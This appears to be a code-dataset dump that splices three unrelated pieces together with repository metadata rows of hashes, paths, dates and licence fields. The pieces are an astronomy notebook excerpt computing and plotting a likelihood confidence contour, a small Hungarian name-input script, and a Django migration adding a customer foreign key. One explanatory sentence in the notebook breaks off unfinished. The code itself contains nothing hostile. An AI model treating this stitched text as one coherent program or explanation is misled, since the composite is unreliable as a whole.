optimize_opts = {"backend": "minuit", "print_level": 0}
# As an example, we can compute the confidence contour for the `alpha` and `beta` parameters of the `dataset_hess`. Here we define the parameter space:
# In[ ]:
result = result_minuit
par_1 = result.parameters["alpha"]
par_2 = result.parameters["beta"]
x = par_1
y = par_2
x_values = np.linspace(1.55, 2.7, 20)
y_values = np.linspace(-0.05, 0.55, 20)
# Then we run the algorithm, by choosing `reoptimize=False` for the sake of time saving. In real life applications, we strongly recommend to use `reoptimize=True`, so that all free nuisance parameters will be fit at each grid node. This is the correct way, statistically speaking, of computing confidence contours, but is expected to be time consuming.
# In[ ]:
stat_surface = fit.stat_surface(
x, y, x_values, y_values, reoptimize=False, **optimize_opts
)
# In order to easily inspect the results, we can convert the $-2\mathrm{ln}(\mathcal{L})$ surface to a surface of statistical significance (in units of Gaussian standard deviations from the surface minimum):
# In[ ]:
# Compute TS
TS = stat_surface["stat_scan"] - result.total_stat
# In[ ]:
# Compute the corresponding statistical significance surface
gaussian_sigmas = np.sqrt(TS.T)
# Notice that, as explained before, the $1\sigma$ contour obtained this way will not contain 68% of the probability, but rather
# In[ ]:
# Compute the corresponding statistical significance surface
# p_value = 1 - st.chi2(df=1).cdf(TS)
# gaussian_sigmas = st.norm.isf(p_value / 2).T
# Finally, we can plot the surface values together with contours:
# In[ ]:
fig, ax = plt.subplots(figsize=(8, 6))
# We choose to plot 1 and 2 sigma confidence contours
levels = [1, 2]
contours = plt.contour(gaussian_sigmas, levels=levels, colors="white")
plt.clabel(contours, fmt="%.0f$\,\sigma$", inline=3, fontsize=15)
im = plt.imshow(
gaussian_sigmas,
extent=[0, len(x_values) - 1, 0, len(y_values) - 1],
origin="lower",
)
fig.colorbar(im)
plt.xticks(range(len(x_values)), np.around(x_values, decimals=2), rotation=45)
plt.yticks(range(len(y_values)), np.around(y_values, decimals=2));
# Note that, if computed with `reoptimize=True`, this plot would be completely consistent with the third panel of the plot produced with `Fit.minos_contour` (try!).
# Finally, always remember that confidence contours are approximations. In particular, when the parameter range boundaries are close to the contour lines, the statistical meaning of the contours is not well defined. That's why we advise always choosing a parameter space that can contain the contours you're interested in.
# In[ ]:
|
[
"[email protected]"
] | |
4c9df0aef998f4392465ebfdb2da7513c530cef6
|
5cb820487419a5e06345590f5f563a09e1949b42
|
/F0003a.py
|
03fccecf0051f01d2f97c39f5355f20102edf0fe
|
[] |
no_license
|
loczylevi/-f0003
|
a84921d0d07dcc3e27e48b18f1e031d9f3dc73e8
|
12ed7125fd0700d8b777c0985c70144335007423
|
refs/heads/master
| 2023-01-11T23:01:45.050216 | 2020-11-08T10:30:43 | 2020-11-08T10:30:43 | 310,523,895 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 134 |
py
|
# Reads the user's surname and given name (prompts are in Hungarian) and prints the full name.
vezetéknév = input('Mi a vezetékneved?')
keresztnév = input('Mi a keresztneved?')
print('A te neved ', vezetéknév, keresztnév,)
|
[
"[email protected]"
] | |
025e7c2fd0563d6420b77dde0117743c67a0e7a4
|
1578ce4b2961a0b89b7fac47e9063acaced21b4c
|
/address/migrations/0002_address_customer.py
|
279c38da990f0df58c68a7d18957b0fcedd9135e
|
[] |
no_license
|
mrpyrex/epytech
|
8125c50b7274ec8511d0677f33b0569ebc5472b5
|
e511cdecc8b554f65ed135b9ac6d312c278fc873
|
refs/heads/master
| 2020-07-20T10:40:17.001431 | 2019-09-11T20:38:42 | 2019-09-11T20:38:42 | 206,624,763 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 616 |
py
|
# Generated by Django 2.1.7 on 2019-09-04 07:21
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('address', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='address',
name='customer',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
preserve_default=False,
),
]
|
[
"[email protected]"
] |